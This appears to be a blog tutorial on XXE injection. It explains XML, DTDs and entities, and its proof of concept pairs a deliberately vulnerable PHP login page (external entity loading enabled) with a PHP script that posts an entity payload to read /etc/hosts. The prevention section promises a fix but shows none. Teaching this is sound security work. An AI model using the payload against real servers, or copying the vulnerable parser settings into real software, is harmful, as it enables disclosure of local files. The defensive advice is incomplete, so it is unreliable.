XXE Injection attacks is a type of injection attack that takes place when parsing XML data. An XXE attack takes place when XML input contains a reference to an external entity and is processed by a weakly configured XML parser.
The XXE attack can lead to disclosure of confidential data, denial of service, server side request forgery, port scanning of the machine parsing the XML data, and command execution. Since the XXE injection attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests or launching a CSRF attack to any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account.
Other XXE injection attacks can access local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released. Note that the application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosures. An attacker can leverage DNS information to exfiltrate data through subdomain names to a DNS server that they control.
Risk Factors
- The application parses XML documents.
- Tainted data is allowed within the system identifier portion of the entity, within the document type declaration (DTD).
- The XML processor is configured to validate and process the DTD.
- The XML processor is configured to resolve external entities within the DTD.
Now let’s move on into the details of XML and XXE Injections then we’ll take a look at an example XXE Injection attack.
What is XML?
- XMLis a software and hardware independent tool for storing and transporting data.
- XMLstands for eXtensible Markup Language and is similar to HTML.
- XMLwas designed to store and transport data and was designed to be self-descriptive.
- WithXML, the author must define both the tags and the document structure.
XML simplifies data sharing, data transport, platform changes, and data availability. XML stores data in a plain text format which provides a software and hardware independent method of storing, transporting, and sharing data. Now that we know what XML is let’s look at the structure of XML.
What does XML look like?
1 2 3 4 5 6 | <message> <to>Jim</to> <from>Janis</from> <subject>Meeting</subject> <body>Don't forget the meeting on Friday!</body> </message> |
As you can see XML is comprised of a series of elements that are very similar to HTML. Now let’s learn about the XML DTD.
What is a DTD?
Now we need to learn about the XML DTD. A DTD is a Document Type Definition which defines the structure and the legal elements and attributes of an XML document. With a DTD, groups of people can agree on a standard DTD or data structure for interchanging data.
An application can use the DTD to verify that XML data is in the proper format. A DTD can be defined internally within an XML document or from an external DTD file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | <?xml version="1.0"?> <!DOCTYPE message [ <!ELEMENT message (to,from,subject,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT subject (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> <message> <to>Jim</to> <from>Janis</from> <subject>Meeting</subject> <body>Don't forget the meeting on Friday!</body> </message> |
- !DOCTYPE message – the root element of this document is message
- !ELEMENT message – the message element must contain four elements: “to,from,subject,body“
- !ELEMENT to – the to element to be of type”#PCDATA”
- !ELEMENT from – the from element to be of type “#PCDATA”
- !ELEMENT subject – the subject element to be of type “#PCDATA”
- !ELEMENT body – the body element to be of type “#PCDATA“
#PCDATA = Parsed Character Data
What does an external DTD look like?
1 2 3 4 5 6 7 8 | <?xml version="1.0"?> <!DOCTYPE message SYSTEM "message.dtd"> <message> <to>Jim</to> <from>Janis</from> <subject>Meeting</subject> <body>Don't forget the meeting on Friday!</body> </message> |
In this example the Document Type Declaration is imported from the message.dtd file into the XML document by using the SYSTEM keyword.
The use of the SYSTEM keyword allowed the inclusion of an external file into the XML document which will prove to be useful XXE Injections.
An Entity is a mechanism to define replacement values where an entity name is declared, and when that name is referenced the entity value is read in its place. I like to think of Entities as coding a variable when you’re programming. An Entity can be declared either internally or from an external URI/URL.
Internal DTD Entity Syntax
1 | <!ENTITY entity-name"entity-value"> |
Internal DTD Entity Example:
1 2 3 | <!ENTITY email "some@email.com"> <!ENTITY author "HackHappy &email;"> <author>&author;</author> |
Resulting XML Data:
1 | <author>HackHappy some@email.com</author> |
Proof Of Concept
To test out a proof of concept we create two PHP pages send.php and login.php. The Send code will send an XML post to the Login code where it will parse the XML post. The Login code is vulnerable to an XXE Injection attack if a properly formatted XML request is received.
Login.php
1 2 3 4 5 6 7 8 9 10 | <?php libxml_disable_entity_loader (false); #allow external entities $xm = file_get_contents('php://input'); #get posted xml $dom = new DOMDocument(); #create xml class $dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD); #load XML data into dom $login = simplexml_import_dom($dom); #parse into XML $user = $login->user; #load username $pass = $login->pass; #load password echo "<pre>You have logged in as user $user</pre>"; #display user logged in ?> |
Send.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | <?php $xml = <<<XML <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE own [ <!ELEMENT own ANY > <!ENTITY own SYSTEM "file:///etc/hosts" >]> <login> <user>&own;</user> <pass>password</pass> </login> XML; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://localhost/login.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $xml); $data = curl_exec($ch); if(curl_errno($ch)) { print curl_error($ch); } else { echo "Response: <br>" . $data; } curl_close($ch); ?> |
Prevent XXE Injections
To prevent an XXE Injection from taking place the following line of code from the login.php code must be changed as seen below.
Stop XXE Injection Attack: https://www.owasp.org/index.php/XML_E…
Add Comment